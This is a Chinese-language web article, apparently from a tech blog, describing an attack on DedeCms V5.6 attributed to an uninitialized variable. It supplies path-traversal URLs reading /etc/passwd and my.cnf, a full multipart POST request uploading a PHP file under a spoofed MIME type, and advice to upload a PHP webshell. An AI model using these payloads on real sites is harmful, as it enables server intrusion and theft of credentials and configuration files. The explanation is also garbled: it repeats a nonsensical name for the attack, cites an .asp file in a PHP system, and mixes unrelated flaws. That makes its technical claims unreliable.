DedeCms V5.6是一款广泛使用的CMS系统,但该系统在变量未被正确初始化的情况下存在漏洞,攻击者可以通过利用该漏洞成功实施鸡助攻击。以下是攻击步骤:
- 攻击者首先需要获取DedeCms V5.6的登录页面,并且需要知道账号和密码才能登录系统;
- 然后攻击者需要构造恶意请求,通过向upload_picture.php文件中的path参数追加../路径,使得脚本读取到恶意文件;
- 接着,攻击者需发送POST请求,在上传图片的时候通过指定非预期的mime类型来欺骗程序并绕过文件类型的检查;
- 变量未被正确初始化的漏洞在程序执行完上传操作后执行了相应的URL跳转操作时被触发,攻击者需要通过篡改URL中的相关参数,包括filename、des和url,来绕过校验并实现攻击。
以上是一种漏洞攻击的过程,以下是对攻击步骤的详细解释及利用漏洞进行攻击的实例说明:
步骤1:
攻击者访问DedeCms V5.6的登录页面,如“http://www.example.com/login.php”,然后使用已知的账号和密码进行登录。
步骤2:
攻击者需要构造恶意请求,通过向upload_picture.php文件中的path参数追加../路径,使得脚本读取到恶意文件。攻击者可以使用如下语句进行构造:
http://www.example.com/upload_picture.php?path=../../../../../../etc/passwd
路径参数中的“../”会向上跳转文件夹,从而找到系统的敏感文件,如上面的例子就是敏感文件/etc/passwd。
步骤3:
攻击者可以使用如下POST请求进行上传
POST /upload_picture.php HTTP/1.1
Host: www.example.com
Content-Type: multipart/form-data; boundary=---------------------------15526761153198
Content-Length: 336
-----------------------------15526761153198
Content-Disposition: form-data; name="filename"
test.php
-----------------------------15526761153198
Content-Disposition: form-data; name="des"
test
-----------------------------15526761153198
Content-Disposition: form-data; name="url"
http://www.example.com/test.php
-----------------------------15526761153198
Content-Disposition: form-data; name="img"; filename="test.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------15526761153198--
Payload中只需要稍作修改就可以提交,注意在文件上传时还需要加入payload来触发漏洞,例如指定Content-Type为image/jpeg,而上传的文件则需要是php webshell的文件。
步骤4:
修改URL中的参数来实现鸡助攻击。攻击者可以访问如下URL,篡改其中的变量,从而实现攻击:
http://www.example.com/upload/dede_image.asp?f=../../../../../../my.cnf
变量f的值为../../../../../../my.cnf,这表示访问系统的my.cnf文件并将文件内容返回给攻击者。攻击者可以通过类似的方法来获取网站的数据库信息或其他敏感文件。
总之,DedeCms V5.6漏洞变量未初始化,攻击者可以通过构造恶意的POST请求,并篡改URL中的参数来实现鸡助攻击。网站管理员应该尽快对系统漏洞进行修复,并保持系统的高度警惕,加强安全防护措施,以防止类似的鸡助攻击事件的发生。
本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞 - Python技术站